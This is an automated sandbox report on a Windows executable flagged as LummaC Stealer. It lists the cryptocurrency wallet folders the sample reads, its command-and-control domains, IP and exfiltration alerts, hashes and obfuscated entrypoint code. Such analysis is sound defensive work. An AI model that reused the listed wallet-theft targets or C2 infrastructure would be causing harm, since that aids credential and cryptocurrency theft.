Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	861 Security Software Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	44 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
JqGBbm7.exe	69%	Virustotal		Browse
JqGBbm7.exe	74%	ReversingLabs	Win32.Exploit.Generic
JqGBbm7.exe	100%	Avira	TR/Crypt.TPM.Gen

Source	Detection	Scanner	Label	Link
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
explorebieology.run	104.21.31.208	true	false	high
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
tse1.mm.bing.net	unknown	unknown	false	high
gadgethgfub.icu	unknown	unknown	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/learning/access-management/phishing-attack/	JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	JqGBbm7.exe, 00000000.00000003.1741384736.0000000005716000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	JqGBbm7.exe, 00000000.00000003.1712069801.0000000005712000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	JqGBbm7.exe, 00000000.00000003.1711899590.0000000005737000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711853404.000000000573E000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712069801.0000000005737000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	JqGBbm7.exe, 00000000.00000003.1712543822.0000000005728000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1712490740.000000000572B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JqGBbm7.exe, 00000000.00000003.1742305421.000000000580B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	JqGBbm7.exe, 00000000.00000003.1699572175.0000000000E31000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.31.208	explorebieology.run	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1629893
Start date and time:	2025-03-05 09:13:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JqGBbm7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.21.65.132, 2.21.65.154, 20.109.210.53, 40.126.31.1, 13.107.246.60, 20.223.35.26
Excluded domains from analysis (whitelisted): www.bing.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, ctldl.windowsupdate.com, arc.msn.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:14:08	API Interceptor	8x Sleep call for process: JqGBbm7.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.31.208	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse
	S6uUdOHRxv.exe	Get hash	malicious	LummaC Stealer	Browse
	R3tmayKLpF.exe	Get hash	malicious	LummaC Stealer	Browse
	https://masdom.com	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
explorebieology.run	GMOgZgNpNu.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.179.246
	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse	104.21.31.208
	S6uUdOHRxv.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.31.208
	R3tmayKLpF.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.31.208
ax-0001.ax-msedge.net	rap2o42GBd.vbs	Get hash	malicious	Unknown	Browse	150.171.27.10
	SecuriteInfo.com.Win32.MalwareX-gen.30508.25588.exe	Get hash	malicious	FormBook	Browse	150.171.28.10
	#U00e1raj#U00e1nlatk#U00e9r#U00e9s.mg.exe	Get hash	malicious	Unknown	Browse	150.171.27.10
	SfbAu0ICZn.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	150.171.27.10
	http://imagekit.io/public/share/jedyb8c6o/3d23bf1bd85df6054e8a36ee022113464d68972afd38ce381e64fdf1933d3f92b711d4946c66a4059145e4bf1ff2ccffc63e817dd4e19d81d6140278ab6c7b542101c8bd792e064f02c249b7b97286a6	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	150.171.28.10
	https://app.hellobonsai.com/link/c8063f67300b3cd93813c8bb88f58154?utm_campaign=send_to_client&utm_content=primary-btn&utm_medium=email&utm_source=proposals	Get hash	malicious	Unknown	Browse	150.171.28.10
	09.msi	Get hash	malicious	RedLine	Browse	150.171.28.10
	674219467483TNVZGETYglqnPIZJADRO.dll	Get hash	malicious	Unknown	Browse	150.171.28.10
	GELEPLLV.msi	Get hash	malicious	RedLine, SectopRAT	Browse	150.171.28.10
	hhh.jpg.exe	Get hash	malicious	Unknown	Browse	150.171.28.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MCxU5Fj.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	188.114.97.3
	https://variotok.com	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	virut' in file 'Setup.exe', during attempted open by 'explorer.exe'	Get hash	malicious	Unknown	Browse	104.18.26.149
	GMOgZgNpNu.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	172.67.179.246
	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse	104.21.31.208
	Payment copy-8899.exe	Get hash	malicious	FormBook	Browse	172.67.148.163
	https://040030025.blob.core.windows.net/factura/index.html	Get hash	malicious	Phisher	Browse	1.1.1.1
	MARCH SHIPMENT PLAN DOCS.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	DHL AWB Receipt_pdf.bat.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	SWIFT COPY.xls	Get hash	malicious	Unknown	Browse	104.26.1.139

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	MCxU5Fj.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	104.21.31.208
	GMOgZgNpNu.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.31.208
	xIwQcY1fc4.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer	Browse	104.21.31.208
	transferencia HSBC.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.31.208
	Order Confirmation.xls	Get hash	malicious	Unknown	Browse	104.21.31.208
	transferencia HSBC.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.31.208
	d5Wai5fIAK.exe	Get hash	malicious	Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	104.21.31.208
	VER_3316ARUGVHQMejzy7451UUFA.vbs	Get hash	malicious	Unknown	Browse	104.21.31.208
	S6uUdOHRxv.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.31.208
	QyA6MaTya1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.31.208

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.657586653605286
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	JqGBbm7.exe
File size:	2'996'224 bytes
MD5:	30c1a6337089e68b975438caebc8f497
SHA1:	2cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256:	db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
SHA512:	be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484
SSDEEP:	49152:z8LHkXVgTDqB4QcGbVYljrnFL9gVysR2JwrZlhSMetwfX:I6VgTDM4tGbVujrnFL9WHDei
TLSH:	1CD54AA2A50A61CFD6CE17B89467CDC2682D42F5072469C3E86DF1BE7E63EC025B5C34
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g..............................0...........@...........................1.....>C....@.................................W ..k..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x70e000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C0C953 [Thu Feb 27 20:21:39 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FC064BF3C1Ah
setbe byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007FC064BF3C82h
push esi
dec edx
popad
je 00007FC064BF3C7Bh
push edx
dec esi
jc 00007FC064BF3C8Ah
cmp byte ptr [ebx], dh
push edx
jns 00007FC064BF3C57h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007FC064BF3C5Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007FC064BF3C67h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007FC064BF3C5Ch
dec eax
dec ebp
jo 00007FC064BF3C53h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007FC064BF3C60h
insd
jnc 00007FC064BF3C80h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007FC064BF3C68h
push edx
insb
js 00007FC064BF3C81h
outsb
inc ecx
jno 00007FC064BF3C62h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007FC064BF3C5Ch
dec ebx
js 00007FC064BF3C53h
jne 00007FC064BF3C41h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007FC064BF3C6Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007FC064BF3C4Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007FC064BF3C83h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x62057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x61000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x621f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x60000	0x2e400	d2c5c8d2124adca3731f28b863ab4c9d	False	0.9981260557432432	data	7.987624463356723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x61000	0x1ac	0x200	a6c0b70bf165f6b9e4d36c747e8a40f1	False	0.54296875	data	5.257512990547039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x62000	0x1000	0x200	abe4e884b58240d1cb9001d893d0bcb2	False	0.150390625	data	1.0437720338377494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cmtgbjjz	0x63000	0x2aa000	0x2a9a00	fe090cfc105eb89e3ef011369693cf9b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
amlicovq	0x30d000	0x1000	0x400	231b426cc2373f9cf0387faa5be6f9bd	False	0.8095703125	data	6.270196537648137	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x30e000	0x3000	0x2200	5da3a28f5d73ad82d08ea9d462635b40	False	0.3977481617647059	DOS executable (COM)	4.161252641920357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x61058	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-05T09:14:08.552721+0100	2060538	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu)	1	192.168.2.4	58036	1.1.1.1	53	UDP
2025-03-05T09:14:08.569261+0100	2060536	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run)	1	192.168.2.4	56573	1.1.1.1	53	UDP
2025-03-05T09:14:09.073658+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:09.073658+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:09.533603+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:09.533603+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.31.208	443	TCP
2025-03-05T09:14:10.196038+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:10.196038+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:10.677834+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49734	104.21.31.208	443	TCP
2025-03-05T09:14:11.400800+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49735	104.21.31.208	443	TCP
2025-03-05T09:14:11.400800+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.31.208	443	TCP
2025-03-05T09:14:13.016025+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49736	104.21.31.208	443	TCP
2025-03-05T09:14:13.016025+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.31.208	443	TCP
2025-03-05T09:14:14.404589+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49737	104.21.31.208	443	TCP
2025-03-05T09:14:14.404589+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.31.208	443	TCP
2025-03-05T09:14:16.201598+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49738	104.21.31.208	443	TCP
2025-03-05T09:14:16.201598+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.31.208	443	TCP
2025-03-05T09:14:16.711841+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49738	104.21.31.208	443	TCP
2025-03-05T09:14:17.725240+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49739	104.21.31.208	443	TCP
2025-03-05T09:14:17.725240+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.31.208	443	TCP
2025-03-05T09:14:17.732437+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49739	104.21.31.208	443	TCP
2025-03-05T09:14:19.835558+0100	2060537	ET MALWARE Observed Win32/Lumma Stealer Related Domain (explorebieology .run in TLS SNI)	1	192.168.2.4	49740	104.21.31.208	443	TCP
2025-03-05T09:14:19.835558+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.31.208	443	TCP
2025-03-05T09:14:20.275524+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49740	104.21.31.208	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2025 09:14:08.594052076 CET	49733	443	192.168.2.4	104.21.31.208
Mar 5, 2025 09:14:08.594094992 CET	443	49733	104.21.31.208	192.168.2.4
Mar 5, 2025 09:14:08.594172955 CET	49733	443	192.168.2.4	104.21.31.208
